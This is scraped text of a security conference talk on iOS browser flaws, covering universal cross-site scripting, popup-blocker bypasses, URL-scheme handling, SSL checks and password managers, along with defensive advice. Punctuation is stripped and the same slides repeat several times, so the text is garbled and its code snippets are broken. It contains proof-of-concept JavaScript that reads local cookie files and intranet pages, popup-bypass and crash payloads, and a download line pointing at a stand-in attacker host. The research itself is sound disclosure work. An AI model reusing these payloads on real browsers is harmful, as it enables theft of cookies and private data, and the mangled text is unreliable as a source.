Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 49: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/49.jpg)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 50: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/50.jpg)
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 51: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/51.jpg)
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 52: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/52.jpg)
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
